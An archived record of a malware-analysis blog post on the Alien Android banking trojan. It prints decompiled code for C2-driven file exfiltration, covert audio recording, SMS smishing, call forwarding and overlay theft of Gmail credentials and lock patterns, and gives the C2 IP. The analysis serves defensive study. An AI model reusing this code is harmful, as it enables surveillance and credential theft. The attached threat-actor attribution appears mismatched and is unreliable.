{
	"id": "1aee30fd-2f83-4a07-b55d-6b310afead04",
	"created_at": "2026-04-06T01:32:07.833068Z",
	"updated_at": "2026-04-10T03:36:13.973992Z",
	"deleted_at": null,
	"sha1_hash": "24ad813e844afa215a0ca2caa366747fcde5fc86",
	"title": "Technical analysis of Alien android malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 249075,
	"plain_text": "Technical analysis of Alien android malware\r\nBy Muhammad Hasan Ali\r\nPublished: 2022-09-25 · Archived: 2026-04-06 01:11:59 UTC\r\n10 minute read\r\nIn the name of Allah, the Most Gracious, the Most Merciful\r\nFreePalestine\r\nUnpacking\r\nIf you open the sample in the JEB decompiler, you will find that the class names are obfuscated and the code contains nop instructions, which makes analysis harder and is an indicator that the sample is packed. So we need to get the decrypted payload. We will use this script with Frida to get the payload. I explained in detail how to unpack a sample here and here.\r\nAfter unpacking the sample and getting the payload, we see that the strings are encrypted using Base64 and another encryption routine. The encryption routine is found in d, located in com.mhiauaqmlacl.ypmsfwbkjhsbeoz. We will use this JEB script, but we will change the key value to tycusvgndour. Then add the script to the JEB decompiler. To add the script, press F2 and Create, then copy the script from GitHub and paste it. To run the script, select the encrypted string and press Execute; the decrypted string will be added as a comment. One by one you will find yourself decrypting all the strings and start analyzing the payload. Big thanks to Axelle Ap. 
for all the scripts.\r\nhttps://muha2xmad.github.io/malware-analysis/alien/\r\nPage 1 of 13\n\nFigure(1): decrypting keys and C2 server\r\nTeamViewer helps the devil\r\nThis is an amazing technique that allows the malware to do malicious things even while the user is using the device. The malware opens an overlay screen telling the user that there is a system update and that they need to wait. While the overlay is shown over the screen, the malware performs its malicious actions by connecting to the TeamViewer app.\r\nFigure(2): Fake system update\r\n if(s2.contains(this.a(\"ZWJkNzMyYWFkYjM1NzUwYWJkYTkxYTVlNDgyMDdlZDhiMGNh\"))) { // connect_teamviewer\r\n JSONObject jSONObject6 = new JSONObject(s2);\r\n this.a.e(this, this.b.aK, jSONObject6.getString(this.a(\"ZWJkNzMyYWFkYjM1NzUwYWJkYTkxYTVlNDgy\r\n this.a.e(this, this.b.aL, jSONObject6.getString(this.a(\"ZjhkOTJmYjdjOTM5NzMzMQ==\"))); // pa\r\n this.a.e(this, this.b.aO, jSONObject6.getString(this.a(\"ZWVkOTM3YTE=\"))); // fake\r\n this.a.e(this, this.b.aM, jSONObject6.getString(this.a(\"ZTBkMTM4YTBkYjM4\"))); // hidden\r\n this.a.e(this, this.b.aN, jSONObject6.getString(this.a(\"ZWFkNDMzYTdkNTNmNmYzMg==\"))); // bl\r\n this.a.f(this);\r\n i.f(this, this.a(\"ZWJkNzMxZWFjYTMzNjAzOGJmYTUxZTQ0NWIzYjM1YzdiYWNiOTZiODljYTY5MTNhZGFlYQ==\")\r\n goto label_5;\r\n }\r\n if(s2.contains(this.a(\"ZTdjODM5YWFlMTIyNjQzNGE0YmExMjU2NDkyYzY5\"))) { // open_teamviewer\r\n JSONObject jSONObject7 = new JSONObject(s2);\r\n this.a.e(this, this.b.aO, jSONObject7.getString(this.a(\"ZWVkOTM3YTE=\"))); // fake\r\n this.a.e(this, this.b.aM, jSONObject7.getString(this.a(\"ZTBkMTM4YTBkYjM4\"))); // hidden\r\n this.a.e(this, this.b.aN, jSONObject7.getString(this.a(\"ZWFkNDMzYTdkNTNmNmYzMg==\"))); // bl\r\n this.a.f(this);\r\n i.f(this, this.a(\"ZWJkNzMxZWFjYTMzNjAzOGJmYTUxZTQ0NWIzYjM1YzdiYWNiOTZiODljYTY5MTNhZGFlYQ==\")\r\n goto label_5;\r\n }\r\n 
if(s2.contains(this.a(\"ZmJkZDMyYTBlMTI1NjQyMWJkYTUxNTU0NGQ=\"))) { // send_settings\r\n JSONObject jSONObject8 = new JSONObject(s2);\r\n this.a.e(this, this.b.aO, jSONObject8.getString(this.a(\"ZWVkOTM3YTE=\"))); // fake\r\n this.a.e(this, this.b.aM, jSONObject8.getString(this.a(\"ZTBkMTM4YTBkYjM4\"))); // hidden\r\n this.a.e(this, this.b.aN, jSONObject8.getString(this.a(\"ZWFkNDMzYTdkNTNmNmYzMg==\"))); // bl\r\n this.a.f(this);\r\n goto label_5;\r\n }\r\n if(!s2.contains(this.a(\"ZWNkZDJhYWRkZDMzNWUyMGE3YTAxNDUwNTU=\"))) { // device_unlock\r\n goto label_5; // device_unlock\r\n }\r\n JSONObject jSONObject9 = new JSONObject(s2);\r\n this.a.e(this, this.b.aO, jSONObject9.getString(this.a(\"ZWVkOTM3YTE=\"))); // fake\r\n this.a.e(this, this.b.aM, jSONObject9.getString(this.a(\"ZTBkMTM4YTBkYjM4\"))); // hidden\r\n this.a.e(this, this.b.aN, jSONObject9.getString(this.a(\"ZWFkNDMzYTdkNTNmNmYzMg==\"))); // blocki\r\n goto label_553;\r\n catch(Exception unused_ex) {\r\n }\r\nData exfiltration\r\nThe malware has the ability to exfiltrate data and send specific files from the victim’s device to the C2 server.\r\nif(s2.contains(this.a(\"ZTdjODM5YWFlMTMwNmUzOWFkYTkwOQ==\"))) { // open_folder\r\n String s3 = new JSONObject(s2).getString(this.a(\"ZTdjODM5YWFlMTMwNmUzOWFkYTkwOQ==\")); // op\r\n if(s3.equals(this.a(\"ZjY5Nw==\"))) { // ~/\r\n s3 = Environment.getExternalStorageDirectory().getAbsolutePath();\r\n }\r\n String[] arr_s = this.a.b(new File(s3));\r\n try {\r\n JSONObject jSONObject1 = new JSONObject();\r\n jSONObject1.put(this.a(\"ZWJkNTM4\"), this.a(\"ZTljYTJlYTVjNzA5NjczY2E1YTkwODZjNTgyNjc3Y2Ji\r\n \r\n jSONObject1.put(this.a(\"ZWNkMTJl\"), i.e(s3)); // dir\r\n jSONObject1.put(this.a(\"ZWVkNzMwYTBkYjI0NzI=\"), i.e(arr_s[0])); // folders\r\n jSONObject1.put(this.a(\"ZWVkMTMwYTFjZA==\"), i.e(arr_s[1])); // files\r\n String s4 = jSONObject1.toString().replace(\"\\\\n\", \"\");\r\n 
this.a.a(this.a(\"YzJlYjEzOGFlMTA1NDQxYjhk\"), s4); // JSON_SEND\r\n this.a.i(this, this.b.H + this.a.h(s4));\r\n goto label_5;\r\n }\r\n catch(JSONException unused_ex) {\r\n }\r\n this.a.a(this.c, this.a(\"Y2RjYTJlYWJjYzc2NmIyNmE2YTI1YjQxNWYzZDNiYzVhNmQ3OGNjNDk0YjY5NjM0Y2N\r\n goto label_5;\r\n }\r\n if(!s2.contains(this.a(\"ZmRjODMwYWJkZjMyNjgzYmFkOTMxZDVhNTIyYw==\"))) { // uploadind_file\r\n goto label_273; // uploadind_file\r\n }\r\n jSONObject2 = new JSONObject(s2);\r\n \r\nCollected data\r\nThe malware collects data from the victim’s device, such as the battery percentage, the device language, the Accessibility Service status, the phone number of the line in use, Google accounts, and the permissions it has obtained on the device, and then sends it to the C2 server.\r\n try { // DM\r\n jSONObject0.put(jwozx0.a(\"Y2NmNQ==\"), s2); // DM\r\n jSONObject0.put(jwozx0.a(\"YzlmYw==\"), jwozx0.a(\"ZTZjZDMwYTg=\")); // null\r\n // AD\r\n jSONObject0.put(jwozx0.a(\"Y2FmNA==\"), i.battary_percentage(context0)); // BL\r\n jSONObject0.put(jwozx0.a(\"ZGNlZg==\"), jwozx0.a.sharedpref(context1, c0.af)); // TW\r\n String s3 = jwozx0.a(\"ZGJmOQ==\"); // SA\r\n String phone_num = i.s(this) ? \"Yjk=\" : \"Yjg=\"; // 0\r\n // 1\r\n String s5 = jwozx0.a(phone_num);\r\n jSONObject0.put(s3, s5);\r\n jSONObject0.put(jwozx0.a(\"ZGJlOA==\"), jwozx0.a.sharedpref(context1, c0.ar)); // SP\r\n jSONObject0.put(jwozx0.a(\"ZGJlYg==\"), i.u(context0)); // SS\r\n jSONObject0.put(jwozx0.a(\"YzRmZA==\"), Locale.getDefault().getLanguage()); // LE\r\n String s6 = jwozx0.a(\"ZGJlMQ==\"); // SY\r\n String phone_num = i.accessibility_status(context1, ojfiq.class) ? \"Yjk=\" : \"Yjg=\"; // 0\r\n // 1\r\n String s8 = jwozx0.a(phone_num);\r\n jSONObject0.put(s6, s8);\r\n jSONObject0.put(jwozx0.a(\"ZGJmNQ==\"), i.default_sms_pkg(this)); // SM\r\n jSONObject0.put(jwozx0.a(\"YzFmYw==\"), s1); // ID\r\n jSONObject0.put(jwozx0.a(\"YzFlYg==\"), jwozx0.a.sharedpref(context1, c0.ae)); // IS\r\n String s9 = jwozx0.a(\"YzZlYQ==\"); // NR\r\n String phone_num = context1.checkCallingOrSelfPermission(jwozx0.a.a.p) == 0 ? ((TelephonyManager)con\r\n jSONObject0.put(s9, phone_num);\r\n jSONObject0.put(jwozx0.a(\"Y2ZmOQ==\"), i.google_acc(this)); // GA\r\n jSONObject0.put(jwozx0.a(\"ZDhlYg==\"), i.check_permission(jwozx0, c0.q[0])); // PS\r\n jSONObject0.put(jwozx0.a(\"ZDhmYg==\"), i.check_permission(jwozx0, c0.q[1])); // PC\r\n jSONObject0.put(jwozx0.a(\"ZDhlOA==\"), i.check_permission(jwozx0, c0.q[2])); // PP\r\n jSONObject0.put(jwozx0.a(\"ZDhmNw==\"), i.check_permission(jwozx0, c0.q[3])); // PO\r\n }\r\n catch(JSONException unused_ex) {\r\n jwozx0.a.a(s, jwozx0.a(\"Y2RlYTBlOGJlYzc2NGIwNjg2ODI1YjcwNzYwYzU4ZTRmNWZhYWRjMg==\")); // ERROR JSON\r\n }\r\nRecording audio\r\nThe malware has the ability to record audio without the user’s knowledge.\r\nprotected void onHandleIntent(Intent intent0) {\r\n try { // tick\r\n int v = Integer.parseInt(intent0.getStringExtra(this.a(\"ZmNkMTNmYWY=\"))); // tick\r\n String s = intent0.getStringExtra(this.a(\"ZTZkOTMxYTE=\")); // name\r\n if(v \u003e 0 || v == -1) {\r\n String s1 = new SimpleDateFormat(this.a(\"YzVmNTcxYTBkYTdiNzgyY2IwYjUyNDdiNzY3Mzc2YzJlZmNiOTE=\"),\r\n this.d = this.getExternalFilesDir(null) + (this.a(\"YTc=\") + s + this.a(\"ZDc=\") + s1 + this.a(\"YT\r\n \r\n \r\n this.b.a(this.a(\"Y2VmMTEwODE5ZTA0NDQxNg==\"), this.d); // FILE REC\r\n this.b.a(this.a(\"ZGNkMTMxYTE=\"), String.valueOf(v)); // Time\r\n String s2 = this.d;\r\n MediaRecorder mediaRecorder0 = new MediaRecorder();\r\n this.b.a(this.a(\"ZGJmNzA5OGFmYQ==\"), 
this.a(\"ZGJlYzFkOTZlYTc2NTMxMDhhODMyOTc3MWUxYTU0ZmE5YmZj\"))\r\n \r\n this.a = false;\r\n mediaRecorder0.setAudioSource(1);\r\n mediaRecorder0.setOutputFormat(3);\r\n mediaRecorder0.setAudioEncoder(1);\r\n mediaRecorder0.setOutputFile(s2);\r\n Thread thread0 = new Thread(new Runnable() {\r\n @Override\r\n public final void run() {\r\n try {\r\n if(v == -1) {\r\n Thread.sleep(900000L);\r\n }\r\n else {\r\n Thread.sleep(v * 1000);\r\n }\r\n }\r\n catch(InterruptedException unused_ex) {\r\n izyiyumk.this.b.a(izyiyumk.this.a(\"ZGJmNzA5OGFmYQ==\"), izyiyumk.this.a(\"ZGJlYzEzOTQ5\r\n \r\n try {\r\n mediaRecorder0.stop();\r\n mediaRecorder0.release();\r\n izyiyumk.this.b.a(izyiyumk.this.a(\"Y2VmMTEwODE=\"), s2); // FILE\r\n String s = izyiyumk.this.b.j(this, izyiyumk.this.c.ba);\r\n izyiyumk.this.b.e(this, izyiyumk.this.c.ba, s + izyiyumk.this.a(\"YWI5Yjdm\") + s2\r\n if(v == -1) {\r\n if(izyiyumk.this.b.j(this, izyiyumk.this.c.aZ).equals(izyiyumk.this.a(\"Yjk=\"\r\n Intent intent0 = new Intent(this, izyiyumk.class).putExtra(izyiyumk.this\r\n \r\n \r\n \r\n izyiyumk.this.startService(intent0);\r\n return;\r\n }\r\n izyiyumk.this.b.e(this, izyiyumk.this.c.aY, \"\");\r\n return;\r\n }\r\n izyiyumk.this.b.e(this, izyiyumk.this.c.aY, \"\");\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n return;\r\n }\r\n catch(Throwable unused_ex) {\r\n return;\r\n }\r\n izyiyumk.this.b.a(izyiyumk.this.a(\"ZGJmNzA5OGFmYQ==\"), izyiyumk.this.a(\"ZGJlYzEzOTQ5ZTA0\r\n \r\nClassic features\r\nCall and call forward\r\nAfter all call permissions are granted, the malware is able to make calls and forward calls.\r\n try {\r\n Intent intent0 = new Intent(\"android.intent.action.CALL\");\r\n intent0.addFlags(0x10000000);\r\n intent0.setData(Uri.parse(\"tel:\" + Uri.encode(s26)));\r\n context1.startActivity(intent0);\r\n String s27 = \"USSD: \" + s26 + \"[143523#]\";\r\n i1.a(\"USSD\", s27);\r\n i1.f(context1, i1.a.ab, s27);\r\n return;\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n try {\r\n i1.a(\"USSD\", \"Error: Start USSD\");\r\n i1.a(\"USSD\", \"Error USSD[143523#]\");\r\n i1.f(context1, i1.a.ab, \"Error USSD[143523#]\");\r\n return;\r\n label_1329:\r\n i2 = jwozx0.a;\r\n s28 = jSONObject5.getString(jwozx0.a(\"ZTY=\")); // n\r\n }\r\n catch(Exception unused_ex) {\r\n return;\r\n }\r\n try {\r\n Intent intent1 = new Intent(\"android.intent.action.CALL\");\r\n intent1.addFlags(0x10000000);\r\n intent1.setData(Uri.fromParts(\"tel\", \"*21*\" + s28 + \"#\", \"#\"));\r\n context1.startActivity(intent1);\r\n String s29 = \"ForwardCALL: \" + s28 + \"[143523#]\";\r\n i2.a(\"ForwardCall\", s29);\r\n i2.f(context1, i2.a.ab, s29);\r\n return;\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\nSmishing\r\nThe malware has the ability to send SMS messages to any contact using the victim’s phone number. 
The SMS text is received from the C2 server and then sent on to another victim.\r\n public final void send_sms(Context context0, String s, String s1) {\r\n try {\r\n SmsManager smsManager0 = SmsManager.getDefault();\r\n ArrayList arrayList0 = smsManager0.divideMessage(s1);\r\n int v = 0;\r\n PendingIntent pendingIntent0 = PendingIntent.getBroadcast(context0, 0, new Intent(\"SMS_SENT\"), 0);\r\n PendingIntent pendingIntent1 = PendingIntent.getBroadcast(context0, 0, new Intent(\"SMS_DELIVERED\"),\r\n ArrayList arrayList1 = new ArrayList();\r\n ArrayList arrayList2 = new ArrayList();\r\n while(v \u003c arrayList0.size()) {\r\n arrayList2.add(pendingIntent1);\r\n arrayList1.add(pendingIntent0);\r\n ++v;\r\n }\r\n smsManager0.sendMultipartTextMessage(s, null, arrayList0, arrayList1, arrayList2);\r\n String s2 = \"Output SMS:\" + s + \" text:\" + s1 + \"[143523#]\";\r\n this.a(\"SMS\", s2);\r\n this.f(context0, this.a.ab, s2);\r\n this.h(context0, this.sharedpref(context0, this.a.Q));\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\nOverlay attack\r\nThe malware comes with classic features such as the overlay attack. If a targeted app is opened, the malware launches the HTML file for that app.\r\nprotected void onCreate(Bundle bundle0) {\r\n super.onCreate(bundle0);\r\n this.c = new WebView(this);\r\n this.c.getSettings().setJavaScriptEnabled(true);\r\n this.c.setScrollBarStyle(0);\r\n this.c.setWebViewClient(new b(this, 0));\r\n this.c.setWebChromeClient(new a(this, 0));\r\n this.c.loadUrl(this.b.m);\r\n this.setContentView(this.c);\r\n }\r\n @Override // android.app.Activity\r\n public void onDestroy() {\r\n super.onDestroy();\r\n this.c.removeAllViewsInLayout();\r\n this.c.removeAllViews();\r\n this.c.destroy();\r\n this.c = null;\r\n this.finish();\r\n }\r\nOne of the targeted apps is Gmail. 
The malware tries to steal Gmail credentials using an overlay attack, and it also tries to steal the lock pattern with an overlay attack. It then sends the logs to the C2 server.\r\n public void send_log_injects(String s) {\r\n if(!s.isEmpty()) {\r\n if(gtzkggpuaqjntiao.this.g.isEmpty()) {\r\n String s1 = gtzkggpuaqjntiao.this.b.b(20);\r\n gtzkggpuaqjntiao.this.g = s1;\r\n }\r\n JSONObject jSONObject0 = new JSONObject();\r\n if(gtzkggpuaqjntiao.this.f.equals(\"grabbing_pass_gmail\")) {\r\n gtzkggpuaqjntiao.this.b.e(this.mContext, gtzkggpuaqjntiao.this.a.aG, \"\");\r\n String s2 = gtzkggpuaqjntiao.this.a(\"ZWJkNzMxZWFkOTM5NmUzMmE1YTk1NTUyNTAyZDY5YzBiY2RjY2NmMTl\r\n gtzkggpuaqjntiao.this.f = s2;\r\n }\r\n if(gtzkggpuaqjntiao.this.f.equals(\"grabbing_lockpattern\")) {\r\n gtzkggpuaqjntiao.this.b.e(this.mContext, gtzkggpuaqjntiao.this.a.aI, \"\");\r\n gtzkggpuaqjntiao.this.f = \"grabbing_lockpattern\";\r\n String s3 = s.replace(i.f(gtzkggpuaqjntiao.this.a(\"YzRmYjE2ZjRkYjBlNDMzOTkxZmUxNzQ2NWYyNDRkY\r\n // ,\"type_injects\":\"pincode\",\"closed\":\"close_activity_injects\"\r\n \r\n gtzkggpuaqjntiao.this.b.f(this.mContext, gtzkggpuaqjntiao.this.a.ab, gtzkggpuaqjntiao.this.a\r\n \r\n }\r\n else {\r\n try { // application\r\n jSONObject0.put(gtzkggpuaqjntiao.this.a(\"ZTljODJjYThkNzM1NjAyMWEwYTMxNQ==\"), gtzkggpuaqj\r\n jSONObject0.put(gtzkggpuaqjntiao.this.a(\"ZWNkOTI4YTU=\"), s); // data\r\n }\r\n catch(JSONException unused_ex) {\r\n }\r\n i i0 = gtzkggpuaqjntiao.this.b;\r\n Context context0 = this.mContext;\r\n String s4 = gtzkggpuaqjntiao.this.g;\r\n String s5 = jSONObject0.toString();\r\n try {\r\n String s6 = i0.j(context0, s4);\r\n if(s6.isEmpty()) {\r\n i0.e(context0, s4, s5);\r\n }\r\n else {\r\n JSONObject jSONObject1 = new JSONObject(s6);\r\n JSONObject jSONObject2 = new JSONObject(s5);\r\n String s7 = jSONObject1.getString(\"data\");\r\n String s8 = jSONObject1.getString(\"data\");\r\n s5 = 
jSONObject2.getString(\"data\");\r\n i0.a(\"str_getParams\", String.valueOf(s7));\r\n i0.a(\"str_params\", String.valueOf(s5));\r\n JSONObject jSONObject3 = i.a(new JSONObject(s7), new JSONObject(s5));\r\n JSONObject jSONObject4 = new JSONObject();\r\n jSONObject4.put(\"application\", s8);\r\n jSONObject4.put(\"data\", jSONObject3.toString());\r\n i0.a(\"mergedJSON\", jSONObject4.toString());\r\n i0.e(context0, s4, jSONObject4.toString());\r\n }\r\n }\r\n catch(Exception unused_ex) {\r\n i0.a(\"JSON\", \"ERROR SettingsToAddJson\");\r\n i0.e(context0, s4, s5);\r\n }\r\nCommands\r\nThese are all the commands the malware receives from the C2 server to perform its malicious actions.\r\n jwozx0.a.a(s, jwozx0.a(\"ZWZkZDI4ZTRjYzIzNmYwYWFhYTExZjA5MWU=\") + jSONObject3.toString()); // get run_cmd:\r\n jSONObject5 = new JSONObject(new String(Base64.decode(jSONObject3.getString(jwozx0.a(\"ZWNkOTI4YT\r\n String s25 = jSONObject5.getString(jwozx0.a(\"ZWJkNTM4\")); // cmd\r\n switch(s25) {\r\n case \"remove_app\": {\r\n goto label_1633;\r\n }\r\n case \"get_all_permission\": {\r\n goto label_1761;\r\n }\r\n case \"run_socks5\": {\r\n goto label_1764;\r\n }\r\n case \"notification\": {\r\n goto label_1383;\r\n }\r\n case \"send_sms\": {\r\n jwozx0.a.send_sms(context1, jSONObject5.getString(jwozx0.a(\"ZTY=\")), jSONObject5.getStri\r\n return;\r\n }\r\n case \"run_admin_device\": {\r\n goto label_1706;\r\n }\r\n case \"sms_mailing_phonebook\": {\r\n goto label_1647;\r\n }\r\n case \"call_forward\": {\r\n goto label_1329;\r\n }\r\n case \"request_permission\": {\r\n goto label_1713;\r\n }\r\n case \"send_mailing_sms\": {\r\n jwozx0.a.a(context1, jSONObject5.getString(jwozx0.a(\"ZTY=\")), jSONObject5.getString(jwoz\r\n return;\r\n }\r\n case \"remove_bot\": {\r\n goto label_1655;\r\n }\r\n case \"grabbing_pass_gmail\": {\r\n goto label_1720;\r\n }\r\n case \"clean_cache\": {\r\n goto 
label_1857;\r\n }\r\n case \"ussd\": {\r\n goto label_1282;\r\n }\r\n case \"rat_connect\": {\r\n goto label_1667;\r\n }\r\n case \"get_data_logs\": {\r\n goto label_1607;\r\n }\r\n case \"grabbing_lockpattern\": {\r\n goto label_1737;\r\n }\r\n case \"stop_socks5\": {\r\n goto label_1801;\r\n }\r\n case \"change_url_connect\": {\r\n goto label_1673;\r\n }\r\n case \"patch_update\": {\r\n goto label_1866;\r\n }\r\n case \"url\": {\r\n goto label_1614;\r\n }\r\n case \"update_inject\": {\r\n goto label_1808;\r\n }\r\n case \"run_app\": {\r\n goto label_1621;\r\n }\r\n case \"run_record_audio\": {\r\n goto label_1815;\r\n }\r\n case \"access_notifications\": {\r\n goto label_1752;\r\n }\r\n case \"change_url_recover\": {\r\n goto label_1689;\r\n }\r\n case \"grabbing_google_authenticator2\": {\r\n goto label_1628;\r\n }\r\n }\r\nIf you want to download Android malware samples, you can join apkdetect for free.\r\nIoC\r\nAPK hash: ea4960b84756fd82fe43cb2cffdbe464df6dd4d48aa10d1cefe38aa8ac6eb44d\r\nPayload (YBIw.json) hash: 603fcae1ef4062087e0e09aa377c03fcc8bbd6f3db443717957f1bfe8c4a4dae\r\nC2 server:\r\nhttp://185.255.131.145/\r\nArticle quote\r\nLike a kiss on a dead man’s forehead, it is worth nothing.\r\nREF\r\nAlien Technical Analysis Report\r\nJEB script\r\nSource: https://muha2xmad.github.io/malware-analysis/alien/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://muha2xmad.github.io/malware-analysis/alien/"
	],
	"report_names": [
		"alien"
	],
	"threat_actors": [
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439127,
	"ts_updated_at": 1775792173,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24ad813e844afa215a0ca2caa366747fcde5fc86.pdf",
		"text": "https://archive.orkl.eu/24ad813e844afa215a0ca2caa366747fcde5fc86.txt",
		"img": "https://archive.orkl.eu/24ad813e844afa215a0ca2caa366747fcde5fc86.jpg"
	}
}